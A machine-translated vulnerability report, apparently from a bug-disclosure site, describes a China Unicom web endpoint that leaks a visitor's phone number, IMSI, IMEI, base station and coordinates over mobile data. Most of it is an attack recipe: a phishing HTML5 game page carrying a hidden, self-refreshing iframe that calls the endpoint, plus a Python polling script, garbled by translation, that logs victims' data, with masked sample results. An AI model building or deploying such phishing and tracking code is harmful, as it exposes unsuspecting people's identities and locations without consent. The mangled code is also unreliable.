Some mobile phone information and LBS information may be leaked in non-Wi-Fi environments due to system interface defects of China Unicom

Some mobile phone information and LBS information may be leaked in non-Wi-Fi environments due to system interface defects of China Unicom

Some mobile phone information and LBS information may be leaked in non-Wi-Fi environments due to system interface defects of China Unicom

Http://www.unicomlabs.com/contact this site for design defects

The mobile phone uses 3G or 4G data connection to access the http://www.unicomlabs.com/can query the current mobile phone number, IMSI, on-line base station number, on-line small area number, Earth coordinates, Mars coordinates, etc.

Through packet capture we found a link in the response iframe when accessing the http://www.unicomlabs.com

Http://www.unicomlabs.com/Number.asp? Unikey = e16e9ef8df3c1efd7ba182514244ed58


If the phone uses 3G or 4G data connection to access the http://www.unicomlabs.com/Number.asp? Unikey = e16e9ef8df3c1efd7ba182514244ed58
 

 

Now, you can view your mobile phone number, IMSI, online base station number, online small area number, Earth coordinate, and Mars coordinate on your computer.
 

How to: link the http://www.unicomlabs.com/Number.asp? Unikey = e16e9ef8df3c1efd7ba182514244ed58 embedded in the phishing page and sent to the other party

This link can be monitored locally to obtain information such as the recipient's mobile phone number.



Here I made a phishing page for html5 games, which can be shared in the circle of friends. I can use scripts to monitor them locally in real time.

Main Code:

<SCRIPT LANGUAGE="JavaScript"> <!-- function fresh(){ document.getElementById('frame0').src='http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58'; setTimeout("fresh()",5000);  } setTimeout("fresh()",5000);  //--> </SCRIPT> <iframe id="frame0" src="http://www.unicomlabs.com/Number.asp?unikey=e16e9ef8df3c1efd7ba182514244ed58"width="0" height="0" scrolling="yes" frameborder="0" style= "display :none " />

You can use python to write a script for monitoring on the local end.

Import requestsimport reimport export ype = sys. getfilesystemencoding () print 'listening... 'headers = {'user-agent': 'mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) chrome/37.0.2062.94 Safari/537.36 '} key = 'unable to detect the number' for x in xrange (): r = requests. get ('HTTP: // www.unicomlabs.com/Number.asp? Unikey = 660275b7d6ba757b74587343208f6003 # ', headers = headers) s = r. content. decode ("gbk "). encode (type) if (s. find (key)> 0): print 'second '+ str (x) + 'second request 'else: print' Second '+ str (x) + The requested data is obtained successfully!] 'F = open ("un.html", 'A') f. write (s + '\ n \ n') f. close ()

 

 

 

 

Obtained data

Native number 18600 ****** 7IMSI460010 ***** 6 ***** 67 my phone bill click to view the bearer network WCDMA access apnw.net terminal IMEI355 ***** 05344 ***** 0 Terminal Model HTC HTC Corp, has launched the base station No. 41 ** 2, and launched the Small Area No. 22 ** 1 Earth coordinate E116. ** 01, n40.0 ** 6 Mars coordinate E116.2 ** 22, N40.0 ** 86

 

 

Solution:

Filter